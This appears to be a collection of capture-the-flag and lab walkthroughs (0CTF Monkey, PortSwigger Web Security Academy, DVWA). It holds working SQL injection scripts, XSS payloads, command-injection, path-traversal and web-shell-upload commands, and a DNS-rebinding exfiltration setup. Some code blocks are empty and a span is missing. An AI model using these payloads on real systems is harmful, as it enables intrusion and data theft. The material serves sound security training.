├── 0CTF 2016 Quals ├── README.md └── monkey.md ├── Burp-Academy └── burp-academy.md ├── DVWA ├── dvwa-hard.md ├── dvwa-low.md └── dvwa-medium.md ├── PentesterAcademy └── js-for-pentesters.md ├── README.md ├── ctf.infosecinstitute.com └── README.md ├── exploit-exercises.com └── nebula.md ├── flaws.cloud └── flaws.cloud.md ├── hacking-lab.com ├── top10.md └── webgoat │ ├── README.md │ ├── challenge1.md │ ├── challenge10.md │ ├── challenge11.md │ ├── challenge12.md │ ├── challenge13.md │ ├── challenge14.md │ ├── challenge15.md │ ├── challenge16.md │ ├── challenge17.md │ ├── challenge18.md │ ├── challenge2.md │ ├── challenge3.md │ ├── challenge4.md │ ├── challenge5.md │ ├── challenge6.md │ ├── challenge7.md │ ├── challenge8.md │ └── challenge9.md ├── ropemporium.com ├── ropemporium32.md └── ropemporium64.md └── wechall.net ├── natas.md └── wechall.md /0CTF 2016 Quals/README.md: -------------------------------------------------------------------------------- 1 | 2 | 0CTF 2016 Quals (https://ctf.0ops.net/) 3 | -------------------------------------------------------------------------------- /0CTF 2016 Quals/monkey.md: -------------------------------------------------------------------------------- 1 | 2 | ### Monkey (Web 4) 3 | 4 | #### Vulnerability 5 | 6 | Generally: browsers inherent weakness and susceptibility to DNS rebinding attacks and in particular: lack of DNS pinning countermeasure in Monkey "browser". 7 | 8 | #### Exploitation 9 | 10 | **Overview** 11 | 12 | We were given a clue that Monkey will staty on visited page for 2 minutes. So to exploit it we need to: 13 | 14 | - delay execution of our javascript for as long as possible (but of courese 15 | less than 2 minutes) 16 | - make sure that our domain has low TTL set (60 sec for example) 17 | 18 | When Monkey will be visting our domain it will be resolved to `4.3.2.1` IP but 19 | after 110 sec (when the js will woke up from timeout) Monkey will need to do 20 | additional DNS query (due to already expired TTL) to execute this line: 21 | `xhttp.open("GET", "http://x.mydomain.com:8080/secret", false);` and this time 22 | (after chainging DNS setting in between) the domain will resolve to `127.0.0.1`. 23 | 24 | **Prerequisites** 25 | 26 | - server with public IP (for example AWS t2.nano instance with IP 4.3.2.1) 27 | - domain name pointing to above machine (for example x.mydomain.com) with low 28 | TTL value (60 sec) 29 | 30 | **Server preparation** 31 | 32 | ``` 33 | $ cat < file.html 34 | 35 | 36 | 37 | 38 | 50 | 51 | 52 | EOF 53 | ``` 54 | 55 | $ python3 -m http.server --bind 0.0.0.0 8080 56 | 57 | **Finding prove of work** 58 | 59 | $ links https://www.google.com/?q=<6_chars_from_monkey_page>+md5 60 | 61 | **Triggering Monkey to browse your `x.mydomain.com:8080/file.html`** 62 | 63 | $ curl http://202.120.7.200/run.php -d 'task=&url=' 64 | 65 | **Changing DNS setting** 66 | 67 | In AWS Route 53 change: `x.mydomain.com -> 127.0.0.1` 68 | 69 | Verify change of DNS setting: 70 | 71 | $ dig +nocmd +noall +answer x.mydomain.com 72 | 73 | After 110 secs observe python's http.server logs for flag. 74 | 75 | Flag: 0ctf{monkey_likes_banananananananaaaa} 76 | -------------------------------------------------------------------------------- /Burp-Academy/burp-academy.md: -------------------------------------------------------------------------------- 1 | 2 | ### Lab: LAB-NAME-HERE 3 | 4 | **Target** 5 | 6 | **Discovery** 7 | 8 | **Analysis** 9 | 10 | **Exploitation** 11 | 12 | **Mitigation** 13 | 14 | ## SQL injection 15 | 16 | ### Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data 17 | 18 | https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data 19 | 20 | Payload: `' OR 'a'='a'--` 21 | 22 | Solution: 23 | 24 | https://ac621fd21eb2b0e1c082847f00be0097.web-security-academy.net/filter?category=%27%20OR%20%27a%27=%27a%27-- 25 | 26 | ### Lab: SQL injection vulnerability allowing login bypass 27 | 28 | https://portswigger.net/web-security/sql-injection/lab-login-bypass 29 | 30 | Payload: `' or '1'='1` 31 | 32 | Solution: 33 | 34 | curl -s https://ac961fbe1e874560c0a53e2700c50025.web-security-academy.net/login -d 'csrf=02gPIAfYLxmgx07NosP5ChXUji8LZDi0&username=administrator&password=%27+or+%271%27%3D%271' 35 | 36 | ## Lab: SQL injection UNION attack, determining the number of columns returned by the query 37 | 38 | https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns 39 | 40 | Payload: 41 | 42 | ' union select null,null,null-- 43 | 44 | ### Lab: SQL injection UNION attack, finding a column containing text 45 | 46 | https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text 47 | 48 | Payload: 49 | 50 | ' union select null,'We2TqZ',null-- 51 | 52 | ### Lab: SQL injection UNION attack, retrieving data from other tables 53 | 54 | https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables 55 | 56 | Payload: 57 | 58 | ' union select username,password FROM users-- 59 | 60 | ### Lab: SQL injection UNION attack, retrieving multiple values in a single column 61 | 62 | https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column 63 | 64 | Payload: 65 | 66 | ' union select null,concat(username,password) FROM users-- 67 | 68 | ### Lab: SQL injection attack, querying the database type and version on Oracle 69 | 70 | https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle 71 | 72 | Payload: 73 | 74 | ' UNION SELECT banner,null FROM v$version -- 75 | 76 | ### Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft 77 | 78 | https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft 79 | 80 | Payload: 81 | 82 | ' union select @@version,null--%20 83 | 84 | ### Lab: SQL injection attack, listing the database contents on non-Oracle databases 85 | 86 | https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle 87 | 88 | List tables: 89 | 90 | %27%20union%20select+TABLE_NAME,null+FROM+information_schema.tables-- 91 | 92 | List column names from selected table: 93 | 94 | %27%20union%20select+COLUMN_NAME,null+FROM+information_schema.columns+WHERE+table_name+=+'users_dxfmgd'-- 95 | 96 | List users and passwords: 97 | 98 | %27%20union%20select+username_ppvobv,password_vddlrf+FROM+users_dxfmgd-- 99 | 100 | ### Lab: SQL injection attack, listing the database contents on Oracle 101 | 102 | https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle 103 | 104 | ### Lab: Blind SQL injection with conditional responses 105 | 106 | https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses 107 | 108 | Solution: 109 | 110 | ``` 111 | #!/usr/bin/python3 112 | 113 | # (http://docs.python-requests.org/en/latest/) 114 | import requests 115 | from requests import get 116 | import sys 117 | 118 | s = requests.session() 119 | 120 | for j in range(1,21): 121 | for i in range(48,122): 122 | 123 | payload = "sA0oQJbDuua9SbuH'+AND+ASCII(SUBSTR((SELECT+Password+FROM+Users+WHERE+Username+%3d+'administrator'),"+str(j)+","+str(j)+"))="+str(i)+"--+" 124 | cookie = dict(TrackingId=payload) 125 | r = s.get("https://0a07001f038c1271c616462c001d0021.web-security-academy.net/filter?category=Pets", headers=headers, cookies=cookie) 126 | 127 | if 'Welcome back!' in r.text: 128 | print(chr(i)) 129 | break 130 | ``` 131 | 132 | ### Lab: Blind SQL injection with conditional errors 133 | 134 | https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors 135 | 136 | Solution: 137 | 138 | ``` 139 | #!/usr/bin/python3 140 | 141 | # (http://docs.python-requests.org/en/latest/) 142 | import requests 143 | from requests import get 144 | import sys 145 | 146 | s = requests.session() 147 | 148 | for j in range(1,21): 149 | for i in range(48,122): 150 | 151 | payload = "YHjR3e0Tqh1FkBsZ' AND (SELECT CASE WHEN (ASCII(SUBSTR(Password, "+str(j)+","+str(j)+")) = "+str(i)+") THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a" 152 | cookie = dict(TrackingId=payload) 153 | r = s.get("https://0a3d009603a90aa2c3a970580085001c.web-security-academy.net/filter?category=Gifts", cookies=cookie) 154 | 155 | if r.status_code == 500: 156 | print(chr(i)) 157 | break 158 | ``` 159 | 160 | ### Lab: Visible error-based SQL injection 161 | 162 | https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based 163 | 164 | Payload: 165 | 166 | ' AND CAST((SELECT password from users LIMIT 1) AS bool)-- 167 | 168 | ### Lab: Blind SQL injection with time delays 169 | 170 | https://portswigger.net/web-security/sql-injection/blind/lab-time-delays 171 | 172 | Payload: 173 | 174 | ;SELECT+pg_sleep(10)-- 175 | 176 | ### Lab: Blind SQL injection with time delays and information retrieval 177 | 178 | https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval 179 | 180 | Solution: 181 | 182 | ``` 183 | #!/usr/bin/python3 184 | 185 | # (https://docs.python-requests.org/en/latest/) 186 | import requests 187 | from requests import get 188 | import sys 189 | import datetime 190 | 191 | s = requests.session() 192 | 193 | for j in range(1,21): 194 | for i in range(48,122): 195 | 196 | payload = "'%3b SELECT CASE WHEN (ASCII(SUBSTRING(Password, "+str(j)+","+str(j)+")) = "+str(i)+") THEN pg_sleep(7) ELSE pg_sleep(0) END FROM users WHERE username='administrator'--" 197 | cookie = dict(TrackingId=payload) 198 | start = datetime.datetime.now() 199 | r = s.get("https://0a6e00a603ca30c5c0067c0a00470033.web-security-academy.net/filter?category=Gifts", cookies=cookie, timeout=8) 200 | stop = datetime.datetime.now() 201 | elapsed = stop - start 202 | 203 | if elapsed > datetime.timedelta(seconds=7): 204 | print(chr(i)) 205 | break 206 | ``` 207 | 208 | ### Lab: Blind SQL injection with out-of-band interaction 209 | 210 | https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band 211 | 212 | ### Lab: Blind SQL injection with out-of-band data exfiltration 213 | 214 | https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration 215 | 216 | ### Lab: SQL injection with filter bypass via XML encoding 217 | 218 | https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding 219 | 220 | ## XSS 221 | 222 | ### Lab: Reflected XSS into HTML context with nothing encoded 223 | 224 | https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded 225 | 226 | Payload: `` 227 | 228 | Solution: 229 | 230 | https://ac301f9a1feab630c06628c800590004.web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E 231 | 232 | ### Lab: Stored XSS into HTML context with nothing encoded 233 | 234 | https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded 235 | 236 | Payload: `` 237 | 238 | Solution: 239 | 240 | curl -s https://ac441f571ee3c7f6c0d47ecf009500b5.web-security-academy.net/post/comment -d 'csrf=JjGC1fbulzEdU0pPT6g2Ty2tBWcjoEaq&postId=9&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&name=sdf&email=sdfsd%40sdfsdfsdf.er&website=http%3A%2F%2Fdfsd.df' 241 | 242 | ### Lab: DOM XSS in document.write sink using source location.search 243 | 244 | https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink 245 | 246 | Payload: `">` 247 | 248 | Solution: 249 | 250 | https://aca31fc71ff01052c05f047b00ea000b.web-security-academy.net/?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E 251 | 252 | ### Lab: DOM XSS in innerHTML sink using source location.search 253 | 254 | https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink 255 | 256 | Payload: `

` 257 | 258 | Solution: 259 | 260 | https://ac9b1f881fdbcb19c0c5026f00d3008b.web-security-academy.net/?search=%3Cimg+src%3D1+onerror%3D%27alert%281%29%27%2F%3E 261 | 262 | ### Lab: DOM XSS in jQuery anchor href attribute sink using location.search source 263 | 264 | https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink 265 | 266 | Payload: `javascript:alert(document.cookie)` 267 | 268 | Solution: 269 | 270 | https://accb1fd31e8cc586c08e432600d300df.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie) 271 | 272 | ### Lab: DOM XSS in jQuery selector sink using a hashchange event 273 | 274 | https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event 275 | 276 | Payload: ` 1470 | ``` 1471 | 1472 | Entice a victim to visit the site. 1473 | 1474 | ## OS command injection 1475 | 1476 | ### Lab: OS command injection, simple case 1477 | 1478 | https://portswigger.net/web-security/os-command-injection/lab-simple 1479 | 1480 | Solution: 1481 | 1482 | curl -s https://ac6d1f651f877b62c0b55c6900bf0003.web-security-academy.net/product/stock -d 'productId=4;&storeId=whoami' 1483 | 1484 | ## Directory traversal 1485 | 1486 | ### Lab: File path traversal, simple case 1487 | 1488 | https://portswigger.net/web-security/file-path-traversal/lab-simple 1489 | 1490 | Solution: 1491 | 1492 | curl -s https://ac6e1f941f6b5fc4c0268759008a0086.web-security-academy.net/image?filename=../../../etc/passwd 1493 | 1494 | ## Lab: File path traversal, validation of file extension with null byte bypass 1495 | 1496 | https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass 1497 | 1498 | Solution: 1499 | 1500 | curl -s https://acca1fb61f2f6549c01b7fe40084009d.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg 1501 | 1502 | ## Insecure deserialization 1503 | 1504 | ### Lab: Modifying serialized objects 1505 | 1506 | https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects 1507 | 1508 | Solution: 1509 | 1510 | curl -L -k -x 127.0.0.1:8080 --cookie session="$(rawurlencode "$(echo -n 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:5:"admin";b:1;}' |base64 -w 0)")" -s https://acb81f701e4368eac086a2d100ff0039.web-security-academy.net/admin/delete?username=carlos 1511 | 1512 | ## File upload vulnerabilities 1513 | 1514 | ### Lab: Remote code execution via web shell upload 1515 | 1516 | https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload 1517 | 1518 | Solution: 1519 | 1520 | # file upload: 1521 | curl --cookie 'session=dyqaoIriO5ZVrUFaVPkJzQUzO4owEwQG' -s https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='';filename=s.php" -F "csrf=WjAuaitTZfPMr38U0DT3VY3cGA0ActDq" -F "user=wiener" 1522 | # file execution: 1523 | curl https://acdb1f251fb9fcc8c0b20af000e500ae.web-security-academy.net/files/avatars/s.php 1524 | 1525 | ### Lab: Web shell upload via Content-Type restriction bypass 1526 | 1527 | https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass 1528 | 1529 | Solution (as previously but explicitly spoof `Content-Type`): 1530 | 1531 | curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account |grep csrf 1532 | 1533 | curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/my-account/avatar -F "filename=s.php" -F "avatar='';filename=s.php;type=image/png" -F "csrf=bwZwpzDsnnWqkQwAj3vqLuvTEDN06VDx" -F "user=wiener" 1534 | 1535 | curl --cookie 'session=tGHaK4JFRKUYlLN6LiAJi0kyAr3uPPpy' -s https://ac2b1f8e1e792d53c084231a00e50037.web-security-academy.net/files/avatars/s.php 1536 | 1537 | ## Business logic vulnerabilities 1538 | 1539 | ### Lab: Excessive trust in client-side controls 1540 | 1541 | https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls 1542 | 1543 | Solution steps: 1544 | 1545 | 1) Log in 1546 | 2) Intercept 'Add to cart' request and change its `price` parameter 1547 | 3) Buy product for chosen price 1548 | 1549 | ### Lab: High-level logic vulnerability 1550 | 1551 | https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-high-level 1552 | 1553 | Solution: 1554 | 1555 | 1) Log in 1556 | 2) Observe that in `POST /cart` request parameter `quantity` support negative numbers. Therefore total price could be negative 1557 | 3) Taking advantage of (2) put to cart -60 of 2nd product then add first product to the cart 1558 | 4) Total price will be counted: `price of the frst prduct + -60 * price of the 2nd product` so it will be less then number of your credits 1559 | 1560 | ### Lab: Inconsistent security controls 1561 | 1562 | https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-inconsistent-security-controls 1563 | 1564 | Solution steps: 1565 | 1566 | 1) Register as a `administrator` user providing your attacker's email 1567 | 2) Active account using received activation link 1568 | 3) Log in 1569 | 4) Change your email to 'admin@dontwannacry.com` 1570 | 5) Access admin panel and delete 'carlos' user 1571 | 1572 | ### Lab: Flawed enforcement of business rules 1573 | 1574 | https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-flawed-enforcement-of-business-rules 1575 | 1576 | Solution: 1577 | 1578 | 1. Signup for the newsletter with `POST /sign-up`, new promo code will be received. 1579 | 2. Add promo codes alternately till the product will be affordable 1580 | 1581 | ## WebSockets 1582 | 1583 | ### Lab: Manipulating WebSocket messages to exploit vulnerabilities 1584 | 1585 | https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities 1586 | 1587 | Payload: `

` 1588 | 1589 | Solution (3rd party tool used: https://github.com/vi/websocat): 1590 | 1591 | echo -n "{\"message\":\"

\"}" | websocat --text -v - wss://acc21f591f207752c010be23002b006e.web-security-academy.net/chat 1592 | 1593 | ### Lab: Cross-site WebSocket hijacking 1594 | 1595 | This is basically CSRF over websocket connection. Victim is tricked to visit malicious website which performs websocket handshake on behalf of the victim and then gets access to victim's data (chat history). 1596 | 1597 | Solution: 1598 | 1599 | ``` 1600 | 1609 | ``` 1610 | 1611 | Mitigation: 1612 | 1613 | As with standard CSRF, anit CSRF tokens needs to be used to prevent an attacker from forging websocket handshake on behalf of the victim. 1614 | 1615 | ### Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 1616 | 1617 | https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities 1618 | 1619 | ## Authentication 1620 | 1621 | ### Lab: Username enumeration via different responses 1622 | 1623 | https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses 1624 | 1625 | Solution: 1626 | 1627 | ``` 1628 | ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w users.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=FUZZ&password=xyz" -fr 'Invalid' 1629 | 1630 | ffuf -t 10 -x http://127.0.0.1:8080 -X POST -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' -w passwd.txt -u https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login -d "username=applications&password=FUZZ" -fr 'Incorrect' 1631 | 1632 | curl -L -H 'session:S1mBZqhhKbWEuSF9zb9hwAm0YMhcz7T3' 'https://0adb00360441e61fc0fe135e00bc003a.web-security-academy.net/login' -d "username=applications&password=pepper" 1633 | ``` 1634 | 1635 | ### Lab: 2FA simple bypass 1636 | 1637 | https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass 1638 | 1639 | Solution: 1640 | 1641 | ``` 1642 | 1. Provide carlos credentials 1643 | 2. Modify redirect: instead of `/login2` go directly to `/my-account` 1644 | ``` 1645 | 1646 | ### Lab: Password reset broken logic 1647 | 1648 | https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic 1649 | 1650 | Solution: 1651 | 1652 | ``` 1653 | # request reset password link for wiener: 1654 | curl https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password -d "username=wiener" 1655 | 1656 | # set new password for carlos: 1657 | curl -L -k -x 127.0.0.1:8080 --cookie 'session=jhDhbpkpWYLfS9HVTLGS6pDBh6PydHYo' https://0a0c0010038cef70c08939bb006600a1.web-security-academy.net/forgot-password?temp-forgot-password-token=W7J5AbLFD67g5Zrie4vKE9DiyVLUhrnH -d 'temp-forgot-password-token=6KksLbqie6NBvAVcyCPmJr9Qrxskgxzr 1658 | &username=carlos&new-password-1=abc&new-password-2=abc' 1659 | ``` 1660 | 1661 | ## Clickjacking 1662 | 1663 | ### Lab: Basic clickjacking with CSRF token protection 1664 | 1665 | https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected 1666 | 1667 | Solution: 1668 | 1669 | ``` 1670 | 1685 |

click me

1686 | 1687 | ``` 1688 | 1689 | ### Lab: Clickjacking with form input data prefilled from a URL parameter 1690 | 1691 | https://portswigger.net/web-security/clickjacking/lab-prefilled-form-input 1692 | 1693 | Solution: 1694 | 1695 | ``` 1696 | 1711 |

click me

1712 | 1713 | ``` 1714 | 1715 | ### Lab: Clickjacking with a frame buster script 1716 | 1717 | https://portswigger.net/web-security/clickjacking/lab-frame-buster-script 1718 | 1719 | Solution: 1720 | 1721 | ``` 1722 | 1737 |

click me

1738 | 1739 | ``` 1740 | 1741 | ### Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS 1742 | 1743 | https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss 1744 | 1745 | Solution: 1746 | 1747 | ``` 1748 | 1763 |

click me

1764 | 1765 | ``` 1766 | 1767 | ### Lab: Multistep clickjacking 1768 | 1769 | https://portswigger.net/web-security/clickjacking/lab-multistep 1770 | 1771 | Solution: 1772 | 1773 | ``` 1774 | 1796 |

Click me first

1797 |

Click me next

1798 | 1799 | ``` 1800 | 1801 | ## JWT 1802 | 1803 | ### Lab: JWT authentication bypass via unverified signature 1804 | 1805 | **Target** 1806 | 1807 | https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature 1808 | 1809 | **Discovery** 1810 | 1811 | Modify `sub` field in JWT's payload. Request `GET /my-account`. Observe that your username has changed. 1812 | 1813 | **Exploitation** 1814 | 1815 | Modify `sub` field in JWT's payload to `administrator`. Request `GET /admin/delete?username=carlos`. 1816 | 1817 | **Mitigation** 1818 | 1819 | Verify JWT signature on the backend and reject all requests with invalid signature. 1820 | 1821 | ### Lab: JWT authentication bypass via flawed signature verification 1822 | 1823 | **Target** 1824 | 1825 | https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification 1826 | 1827 | **Discovery** 1828 | 1829 | Modify `alg` field in JWT's payload to `null`. Request `GET /my-account`. Observe that your request was accepted. 1830 | 1831 | **Exploitation** 1832 | 1833 | Modify `sub` field in JWT's payload to `administrator`. Modify `alg` field in JWT's payload to `null`. Request `GET /admin/delete?username=carlos`. 1834 | 1835 | **Mitigation** 1836 | 1837 | Require JWT signature on the backend and reject requests with `null` signature. 1838 | 1839 | ## Essential skills 1840 | 1841 | ### Lab: Discovering vulnerabilities quickly with targeted scanning 1842 | 1843 | Payload: 1844 | 1845 | ``` 1846 | 1847 | ``` 1848 | 1849 | Raw request: 1850 | 1851 | ``` 1852 | POST /product/stock HTTP/1.1 1853 | [...] 1854 | Connection: close 1855 | 1856 | productId=&storeId=2 1857 | ``` 1858 | 1859 | ## Race conditions 1860 | 1861 | ### Lab: Limit overrun race conditions 1862 | 1863 | https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun 1864 | 1865 | Solution: 1866 | 1867 | Apply promo code multiple times sending 15 or so requests in paralell: 1868 | 1869 | ``` 1870 | POST /cart/coupon HTTP/2 1871 | ... 1872 | csrf=&coupon=PROMO20 1873 | ``` 1874 | 1875 | ## GraphQL API vulnerabilities 1876 | 1877 | ### Lab: Accessing private GraphQL posts 1878 | 1879 | https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts 1880 | 1881 | Solution: 1882 | 1883 | 1. Notice that `getAllPosts` GraphQL command fetches sequential blog posts IDs without `id=3` 1884 | 2. Use InQL extension to modify query to get blog post with `id=3` - but no password there 1885 | 3. Scan with Burp Scanner grapQL endpoint `/graphql/v1` notice in schema that `BlogPost` command has `postPassword` field 1886 | 4. Use InQL extension to modify query to get blog post with `id=3` and add `postPassword` field to the query 1887 | 1888 | ## API testing 1889 | 1890 | ### Lab: Exploiting an API endpoint using documentation 1891 | 1892 | https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation 1893 | 1894 | Solution: 1895 | 1896 | 1. Log in with provided creds 1897 | 2. visit API docs at `/api/openapi.json` and look for the way to delete user 1898 | 3. Delete user: 1899 | 1900 | ``` 1901 | cat> r.hurl <alert(1); 24 | 25 | ### XSS (Stored) 26 | 27 | Payload for `txtName` field: `

` 28 | -------------------------------------------------------------------------------- /DVWA/dvwa-low.md: -------------------------------------------------------------------------------- 1 | 2 | ### Target 3 | 4 | https://github.com/ethicalhack3r/DVWA 5 | 6 | Security level: low 7 | 8 | ### Prereq 9 | 10 | # get user token 11 | $ TOKEN=$(curl -c dvwa.session -s http://192.168.56.101/DVWA/login.php | grep 'user_token' | awk -F 'value=' '{print $2}' | cut -d"'" -f2) 12 | 13 | # get session id 14 | $ PHPSESSID=$(grep PHPSESSID dvwa.session | awk -F' ' '{print $7}') 15 | 16 | # log in 17 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=low" -v -d "username=admin&password=password&Login=Login&user_token=${TOKEN}" http://192.168.56.101/DVWA/login.php 18 | 19 | ### Brute Force 20 | 21 | $ wget https://raw.githubusercontent.com/seifreed/dirb/master/wordlists/others/best110.txt 22 | 23 | $ hydra -t 1 -l admin -P best110.txt -vV 192.168.56.101 http-get-form "/DVWA/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: PHPSESSID=${PHPSESSID};security=low" 24 | 25 | ### Command Injection 26 | 27 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=low" -d 'ip=;uname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux 28 | 29 | ### CSRF 30 | 31 | # Trick victim (via social engineering means) to visit: 32 | http://192.168.56.101/DVWA/vulnerabilities/csrf/?password_new=pass1&password_conf=pass1&Change=Change 33 | 34 | ### File Inclusion 35 | 36 | $ curl -L -b "PHPSESSID=${PHPSESSID};security=low" -v http://192.168.56.101/DVWA/vulnerabilities/fi/?page=../../hackable/flags/fi.php 37 | 38 | ### File Upload 39 | 40 | ``` 41 | $ cat > b.php < 43 | EOF 44 | 45 | $ curl -x 127.0.0.1:8080 -L -b "PHPSESSID=${PHPSESSID};security=low" -F "MAX_FILE_SIZE=100000" -F "uploaded=@b.php;filename=b.php" -F "Upload=Upload" http://192.168.56.101/DVWA/vulnerabilities/upload/index.php 46 | 47 | $ curl -s -b "PHPSESSID=${PHPSESSID};security=low" http://192.168.56.101/DVWA/hackable/uploads/b.php | grep Linux 48 | ``` 49 | 50 | ### Sql Injection 51 | 52 | #### Manual exploitation 53 | 54 | # detecting SQLi 55 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='&Submit=Submit" 56 | 57 | # check if injecting into string data 58 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+OR+'1'%3D'1&Submit=Submit" 59 | 60 | # retreiving table names 61 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+null%2Ctable_name+FROM+information_schema.tables%23&Submit=Submit" 62 | 63 | # retreiving column names for table 'user' 64 | $ curl -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+null%2Ccolumn_name+FROM+information_schema.columns+WHERE+table_name='user'%23&Submit=Submit" 65 | 66 | # retreiving users hashes 67 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+Password%2CUser+FROM+users%23&Submit=Submit" | grep union 68 | 69 | #### Automated exploitation 70 | 71 | # identify SQLi 72 | $ wfuzz.py -p 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" -w ~/BUILDS/wfuzz/wordlist/Injections/SQL.txt --ss error "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=FUZZ&Submit=Submit" 73 | 74 | # confirm SQLi 75 | $ sqlmap.py --dbms=MySQL --os=Linux --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=U -u "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap.log 76 | 77 | # exploit SQLi 78 | $ sqlmap.py --dbms=MySQL --os=Linux --batch http://127.0.0.1:8080 --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=U -u "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap-exp.log -s sqlmap.session --dump -T users 79 | 80 | ### Sql Injection (Blind) 81 | 82 | Deps: 83 | 84 | https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command 85 | 86 | #### Manual exploitation 87 | 88 | # detecting (blind) SQLi 89 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=$(rawurlencode "1' and 1=1#")&Submit=Submit" | grep 'User ID' | tail -1 90 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=$(rawurlencode "1' and 1=0#")&Submit=Submit" | grep 'User ID' | tail -1 91 | 92 | Exploitation (retreiving DBMS version): 93 | 94 | ``` 95 | $ cat > py.py << 